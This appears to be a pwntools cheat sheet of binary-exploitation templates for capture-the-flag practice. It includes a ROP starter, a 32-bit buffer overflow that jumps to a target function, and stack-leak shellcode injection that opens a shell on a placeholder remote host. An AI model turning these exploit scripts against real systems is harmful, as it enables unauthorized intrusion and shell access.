Skip to main content

Pwntools

sudo pip3 install pwntools

amd64 ELF starter

from pwn import *

context.log_level = 'DEBUG'
context(os='linux', arch='amd64')

## input
filename = "./exe"
offset = 50

## elf stuff
# libc = ELF('./glibc/libc.so.6', checksec=False)
context.binary = elf = ELF(filename)
rop = ROP(elf)
plt = elf.plt
got = elf.got
symbols = elf.sym

## Process
# p = remote()
# p = process(filename)
p = gdb.debug(filename, '''
break *main+50
continue
''')

padding = b"A" * offset

## Stubs
#
# leak = u64(p.recvline().strip().ljust(8, b'\0'))
#
# pop_rdi_ret = rop.find_gadget(['pop rdi', 'ret'])[0]
# ret = rop.find_gadget(['ret'])[0]
# rop_chain = flat(
#     pop_rdi_ret,
#     p64(0x00601060),
#     ret,
#     plt.system,
# )
# payload = padding + rop_chain

payload = padding

p.sendlineafter(b'> ', payload)

p.interactive()

Examples

from pwn import *

pattern = cyclic(100) # 100 bytes long
offset = cyclic_find('vaaa')
from pwn import *

# GDB
# searchmem 0x41414141
# searchmem 0x08049318

# gdb-peda$ searchmem 0x41414141
# [stack] : 0xffffcc50 ("AAAA")

# gdb-peda$ searchmem 0x08049318
# [stack] : 0xffffcd0c --> 0x8049318 (<main+103>:	mov    eax,0x0)

# print/d 0xffffcd0c - 0xffffcc50
# $1 = 188

p = process('./vuln')
# p = remote('x.x.x.x', 30897)
offset = 188

next_address = p32(0x080491e2)
payload = b'A' * offset 
payload += next_address

# because i don't return from target function
payload += p32(0x00000000) 

# arguments to the target function
payload += p32(0xdeadbeef) 
payload += p32(0xc0ded00d)

p.recvline()
p.sendline(payload)

try:
    for i in range(5):
        x = p.recv(1024)
        print(x)
except:
    print("Done.")
from pwn import *

def main():
    context.log_level = 'DEBUG'
    context(os='linux', arch='amd64')

    # io = process('./binary_file')
    io = remote('x.x.x.x', 30774)
    password = 'w00tw00t'

    return_address_offset = 84
    max_payload_length = 137

    io.sendlineafter('> ', b'1')
    stack_address = io.recvline().strip().split()[-1]
    stack_address = ''.join([chr(int(stack_address[i:i+2], 16)) for i in range(2, len(stack_address), 2)])
    stack_address = stack_address.rjust(8, '\x00')
    stack_address = u64(stack_address, endian="big")
    log.success(f'Leaked stack address: {p64(stack_address)}')

    io.sendlineafter('> ', b'2')
    io.sendlineafter('password: ', password.encode())

    shellcode = asm(
            shellcraft.popad() +
            shellcraft.sh()
    )

    padding = b'a' * (return_address_offset - len(shellcode))
    payload = shellcode + padding + p64(stack_address)
    assert len(payload) <= max_payload_length, f'Payload too big. "{len(payload)}"'

    io.sendlineafter('commands: ', payload)
    io.sendlineafter('> ', b'3')
    io.interactive()

if __name__ == '__main__':
    main()